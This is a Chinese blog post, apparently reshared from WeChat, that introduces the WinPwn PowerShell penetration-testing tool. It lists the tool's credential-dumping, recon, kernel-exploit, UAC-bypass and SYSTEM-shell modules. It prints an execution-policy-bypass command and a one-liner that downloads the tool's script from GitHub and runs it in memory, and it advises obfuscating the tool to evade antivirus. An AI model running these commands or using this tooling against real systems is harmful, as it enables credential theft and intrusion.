行业解决方案、产品招募中!想赚钱就来传!>>>
WinPwn
自动化尽可能多的内部渗透测试流程(侦察和开发)具有自动代理识别和集成功能的脚本。
本地调用
powershell.exe -exec bypass -command \"& {import-module C:\\Users\\17782\\Desktop\\WinPwn-master\\WinPwn-master\\offline_WinPwn.ps1;localreconmodules}\"
远程下载调用
iex(new-object net.webclient).downloadstring(\'https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1\')
绕杀软需要自己混淆或者手动对触发器字符串进行编码。
具体功能有:
-
Inveigh
->在新的控制台窗口中执行Inveigh,集成了会话管理(Invoke-TheHash)的SMB-Relay攻击 -
sessionGopher
->执行Sessiongopher询问您参数 -
kittielocal
-> -
模糊的调用-Mimikatz版本
-
内存中的Safetykatz
-
使用rundll32技术转储lsass
-
下载并运行混淆的Lazagne
-
转储浏览器凭证
-
定制的Mimikittenz版本
-
窃取Wifi凭证
-
转储SAM文件NTLM哈希
localreconmodules
->
-
收集已安装的软件,易受攻击的软件,共享,网络信息,组,特权等等
-
检查典型的漏洞,如SMB签名,LLMNR中毒,MITM6,通过HTTP的WSUS
-
检查Powershell事件日志中的凭证或其他敏感信息
-
收集浏览器凭证和历史记录
-
在注册表和文件系统中搜索密码
-
查找敏感文件(配置文件,RDP文件,Keepass数据库)
-
在本地系统上搜索.NET Binaries
-
可选:Get-Computerdetails(Powersploit)和PSRecon
domainreconmodules
->
-
收集各种域信息以进行手动检查
-
在说明字段中找到广告密码
-
搜索潜在的敏感域共享文件
-
枚举不受约束的委派系统/用户
-
生成猎犬报告
-
用于域系统的MS17-10扫描仪
-
适用于域系统的Bluekeep扫描仪
-
SQL Server发现和审核功能-PowerUpSQL
-
MS-RPRN检查域控制器或所有系统
-
Grouper2的组策略审核
-
使用ADRecon在CSV文件(如果已安装Excel,则为XLS)中生成AD报告。
-
检查打印机的常见问题
-
搜索基于资源的约束委派攻击路径
Privescmodules
-
itm4ns调用-PrivescCheck
-
winPEAS
-
Powersploits PowerUp Allchecks,Sherlock,GPPPasswords
-
DLL劫持,文件权限,注册表权限和弱键,烂/多汁土豆检查
kernelexploits
->
-
MS15-077-(XP / Vista / Win7 / Win8 / 2000/2003/2008/2012)仅x86!
-
MS16-032-(2008/7/8/10/2012)!
-
MS16-135-(仅WS2k16)!
-
CVE-2018-8120-2018年5月,Windows 7 SP1 / 2008 SP2,2008 R2 SP1!
-
CVE-2019-0841-2019年4月!
-
CVE-2019-1069-Polarbear硬链接,需要凭据-2019年6月!
-
CVE-2019-1129 / 1130-竞争状况,需要多个核心-2019年7月!
-
CVE-2019-1215-2019年9月-仅x64!
-
CVE-2020-0638-2020年2月-仅x64!
-
CVE-2020-0796-SMBGhost
UACBypass
->
-
UAC Magic,基于James Forshaw在UAC上的三篇文章
-
UAC绕过cmstp技术,作者:Oddvar Moe
-
DiskCleanup UAC旁路,James Forshaw提供
-
DccwBypassUAC技术,作者Ernesto Fernandez和Thomas Vanhoutte
SYSTEMShell
->
-
使用CreateProcess弹出系统shell
-
使用NamedPipe模拟模仿Pop System Shell
-
使用令牌操作的Pop System Shell
-
使用UsoClient DLL加载或CreateProcess绑定系统shell
更多功能,大家可以自行到github上看文档,这个工具不错的。
https://github.com/S3cur3Th1sSh1t/WinPwn#sessiongopher—executes-sessiongopher-asking-you-for-parameters
欢迎各位小伙伴进来交流学习。
本文分享自微信公众号 – 黑白天(li0981jing)。
如有侵权,请联系 [email protected] 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。